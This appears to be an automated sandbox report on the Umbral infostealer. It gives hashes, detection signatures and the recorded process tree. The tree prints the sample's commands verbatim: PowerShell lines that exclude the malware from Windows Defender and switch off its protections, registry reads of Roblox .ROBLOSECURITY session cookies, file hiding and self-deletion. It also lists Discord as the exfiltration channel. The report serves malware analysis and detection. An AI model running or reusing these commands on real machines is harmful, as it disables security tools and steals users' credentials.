Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
18-07-2024 22:29
Behavioral task
behavioral1
Sample
Umbral.exe
Resource
win7-20240708-en
General
-
Target
Umbral.exe
-
Size
231KB
-
MD5
64084e155f8e91598f994297efe19cbd
-
SHA1
83b427e8f3b81d5b5dcc53e361c2eb00518bb2ab
-
SHA256
bd4d72d38d56ab39ea25acd2ce87869f914f352397eae92634e1d8f9f576c8ff
-
SHA512
5f0a26d8dd233c653345b9f163c13795f27322f99157271e1aaff948fda2d77d66d2e6c8b7bdc8b8ec5d08b459f1d847724ad6c3a5596d07c6e26bb9f95884de
-
SSDEEP
6144:RloZM+rIkd8g+EtXHkv/iD4NrcPuMzvEUlwOffuGfOtLBM8e1mqYi:joZtL+EP8NrcPuMzvEUlwOffu+yL8P
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1864-1-0x0000000000C10000-0x0000000000C50000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2744 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Deletes itself 1 IoCs
pid Process 1904 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2992 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1628 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1864 Umbral.exe 2744 powershell.exe 2796 powershell.exe 2700 powershell.exe 1604 powershell.exe 1796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1864 Umbral.exe Token: SeIncreaseQuotaPrivilege 3020 wmic.exe Token: SeSecurityPrivilege 3020 wmic.exe Token: SeTakeOwnershipPrivilege 3020 wmic.exe Token: SeLoadDriverPrivilege 3020 wmic.exe Token: SeSystemProfilePrivilege 3020 wmic.exe Token: SeSystemtimePrivilege 3020 wmic.exe Token: SeProfSingleProcessPrivilege 3020 wmic.exe Token: SeIncBasePriorityPrivilege 3020 wmic.exe Token: SeCreatePagefilePrivilege 3020 wmic.exe Token: SeBackupPrivilege 3020 wmic.exe Token: SeRestorePrivilege 3020 wmic.exe Token: SeShutdownPrivilege 3020 wmic.exe Token: SeDebugPrivilege 3020 wmic.exe Token: SeSystemEnvironmentPrivilege 3020 wmic.exe Token: SeRemoteShutdownPrivilege 3020 wmic.exe Token: SeUndockPrivilege 3020 wmic.exe Token: SeManageVolumePrivilege 3020 wmic.exe Token: 33 3020 wmic.exe Token: 34 3020 wmic.exe Token: 35 3020 wmic.exe Token: SeIncreaseQuotaPrivilege 3020 wmic.exe Token: SeSecurityPrivilege 3020 wmic.exe Token: SeTakeOwnershipPrivilege 3020 wmic.exe Token: SeLoadDriverPrivilege 3020 wmic.exe Token: SeSystemProfilePrivilege 3020 wmic.exe Token: SeSystemtimePrivilege 3020 wmic.exe Token: SeProfSingleProcessPrivilege 3020 wmic.exe Token: SeIncBasePriorityPrivilege 3020 wmic.exe Token: SeCreatePagefilePrivilege 3020 wmic.exe Token: SeBackupPrivilege 3020 wmic.exe Token: SeRestorePrivilege 3020 wmic.exe Token: SeShutdownPrivilege 3020 wmic.exe Token: SeDebugPrivilege 3020 wmic.exe Token: SeSystemEnvironmentPrivilege 3020 wmic.exe Token: SeRemoteShutdownPrivilege 3020 wmic.exe Token: SeUndockPrivilege 3020 wmic.exe Token: SeManageVolumePrivilege 3020 wmic.exe Token: 33 3020 wmic.exe Token: 34 3020 wmic.exe Token: 35 3020 wmic.exe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeIncreaseQuotaPrivilege 2444 wmic.exe Token: SeSecurityPrivilege 2444 wmic.exe Token: SeTakeOwnershipPrivilege 2444 wmic.exe Token: SeLoadDriverPrivilege 2444 wmic.exe Token: SeSystemProfilePrivilege 2444 wmic.exe Token: SeSystemtimePrivilege 2444 wmic.exe Token: SeProfSingleProcessPrivilege 2444 wmic.exe Token: SeIncBasePriorityPrivilege 2444 wmic.exe Token: SeCreatePagefilePrivilege 2444 wmic.exe Token: SeBackupPrivilege 2444 wmic.exe Token: SeRestorePrivilege 2444 wmic.exe Token: SeShutdownPrivilege 2444 wmic.exe Token: SeDebugPrivilege 2444 wmic.exe Token: SeSystemEnvironmentPrivilege 2444 wmic.exe Token: SeRemoteShutdownPrivilege 2444 wmic.exe Token: SeUndockPrivilege 2444 wmic.exe Token: SeManageVolumePrivilege 2444 wmic.exe Token: 33 2444 wmic.exe Token: 34 2444 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1864 wrote to memory of 3020 1864 Umbral.exe 30 PID 1864 wrote to memory of 3020 1864 Umbral.exe 30 PID 1864 wrote to memory of 3020 1864 Umbral.exe 30 PID 1864 wrote to memory of 2632 1864 Umbral.exe 33 PID 1864 wrote to memory of 2632 1864 Umbral.exe 33 PID 1864 wrote to memory of 2632 1864 Umbral.exe 33 PID 1864 wrote to memory of 2744 1864 Umbral.exe 35 PID 1864 wrote to memory of 2744 1864 Umbral.exe 35 PID 1864 wrote to memory of 2744 1864 Umbral.exe 35 PID 1864 wrote to memory of 2796 1864 Umbral.exe 37 PID 1864 wrote to memory of 2796 1864 Umbral.exe 37 PID 1864 wrote to memory of 2796 1864 Umbral.exe 37 PID 1864 wrote to memory of 2700 1864 Umbral.exe 40 PID 1864 wrote to memory of 2700 1864 Umbral.exe 40 PID 1864 wrote to memory of 2700 1864 Umbral.exe 40 PID 1864 wrote to memory of 1604 1864 Umbral.exe 42 PID 1864 wrote to memory of 1604 1864 Umbral.exe 42 PID 1864 wrote to memory of 1604 1864 Umbral.exe 42 PID 1864 wrote to memory of 2444 1864 Umbral.exe 44 PID 1864 wrote to memory of 2444 1864 Umbral.exe 44 PID 1864 wrote to memory of 2444 1864 Umbral.exe 44 PID 1864 wrote to memory of 1848 1864 Umbral.exe 46 PID 1864 wrote to memory of 1848 1864 Umbral.exe 46 PID 1864 wrote to memory of 1848 1864 Umbral.exe 46 PID 1864 wrote to memory of 1908 1864 Umbral.exe 48 PID 1864 wrote to memory of 1908 1864 Umbral.exe 48 PID 1864 wrote to memory of 1908 1864 Umbral.exe 48 PID 1864 wrote to memory of 1796 1864 Umbral.exe 50 PID 1864 wrote to memory of 1796 1864 Umbral.exe 50 PID 1864 wrote to memory of 1796 1864 Umbral.exe 50 PID 1864 wrote to memory of 2992 1864 Umbral.exe 52 PID 1864 wrote to memory of 2992 1864 Umbral.exe 52 PID 1864 wrote to memory of 2992 1864 Umbral.exe 52 PID 1864 wrote to memory of 1904 1864 Umbral.exe 54 PID 1864 wrote to memory of 1904 1864 Umbral.exe 54 PID 1864 wrote to memory of 1904 1864 Umbral.exe 54 PID 1904 wrote to memory of 1628 1904 cmd.exe 56 PID 1904 wrote to memory of 1628 1904 cmd.exe 56 PID 1904 wrote to memory of 1628 1904 cmd.exe 56 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2632 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Views/modifies file attributes
PID:2632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1848
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1796
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2992
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:1628
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d793e0c4ac69b413154d3a851705adb1
SHA1b996e73e893ce9960ed1509684932cff6bc4e79a
SHA256d27be19ccb761bb08d127d8df6b3d292a2c421b7c4b0f636627e24d28440bbc4
SHA5121db47743e32b7fa14fea08dc9b08d0a3c6edeef26418662215ae7be011ecb548a5a8e46af19661156dc2c569b473c721ddf2df5beaa35126f831a6c7aa3ca1d5